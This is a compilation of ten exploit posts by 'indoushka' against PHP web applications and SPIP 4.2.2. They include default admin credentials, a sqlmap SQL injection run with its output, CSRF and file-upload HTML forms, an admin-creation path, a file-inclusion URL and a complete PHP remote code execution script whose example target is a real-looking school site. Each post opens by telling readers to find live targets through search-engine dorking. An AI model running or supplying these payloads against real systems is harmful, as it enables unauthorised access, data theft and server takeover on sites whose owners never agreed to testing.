<pre><code>=============================================================================================================================================<br />| # Title : LMS v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : File Management System 1.0 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /downloads.php?file_id=2 <==== inject here <br /><br />[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/filemanagement/Private_Dashboard/downloads.php?file_id=2 --dbs<br /><br />---<br />[00:07:45] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.58, PHP 8.0.30<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[00:07:45] [INFO] fetching database names<br />[00:07:45] [INFO] fetching number of databases<br />[00:07:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br />[00:07:45] [INFO] retrieved: 5<br />[00:07:45] [INFO] retrieved: information_schema<br />[00:07:54] [INFO] retrieved: file_management<br />[00:08:00] [INFO] retrieved: mysql<br />[00:08:02] [INFO] retrieved: performance_schema<br />[00:08:10] [INFO] retrieved: phpmyadmin<br />available databases [5]:<br />[*] file_management<br />[*] information_schema<br />[*] mysql<br />[*] performance_schema<br />[*] phpmyadmin<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : eClass LMS v6.2.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://codecanyon.net/item/eclass-learning-management-system/25613271 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@mediacity.co.in & pass = 123456<br /><br />[+] https://www/127.0.0.1/swarkalasangamcom/public/testimonial <==== Shell upload<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Task Management System 1.0 CSRF add staff Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The following HTML code creates a new staff.<br /><br />[+] Go to line 27.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] Save code as poc.html.<br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : News Portal v4.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://phpgurukul.com/?sdm_process_download=1&download_id=7643 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new Admin.<br /><br />[+] use payload : admin/register.php<br /><br />[+] http://127.0.0.1/dpnews.rw/admin/admin/register.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : MSMS-PHP v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Mount Carmel School v6.4.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://smart-school.in/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = superadmin@gmail.com & pass = password<br /><br />[+] https://www/127.0.0.1/demo/site/login<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Laundry Management System 1.0 File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/online-laundry-management-system-source-code/?wpdmdl=6058&refresh=66bbd3015dcfe1723585281 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />[+] http://127.0.0.1/laundry_Management_System/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : File Management System 1.0 Arbitrary File upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Line 1 : Set your target.<br /><br />[+] Save As poc.html<br /><br />[+] Payload :<br /><br /> <form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data"><br /> <!-- Hidden Email Input --><br /> <input type="hidden" name="email" value=""><br /><br /> <!-- File Input --><br /> <label for="myfile">Upload File:</label><br /> <input type="file" id="myfile" name="myfile" required><br /><br /> <!-- Submit Button --><br /> <input type="submit" name="save" value="Save"><br /></form><br /><br />[+] /uploads/<br /> <br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.2 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // Generate the payload, embedding the command to be executed<br /> return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // Prepare the POST data that will be sent to the target<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // Initialize the HTTP request using cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // Add custom headers to bypass blocking<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // Execute the request<br /> $response = curl_exec($ch);<br /><br /> // Check for cURL errors<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// Usage example<br />$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // Replace this with the real address<br />$payload = 'system("pwd");'; // PHP commands you want to execute<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>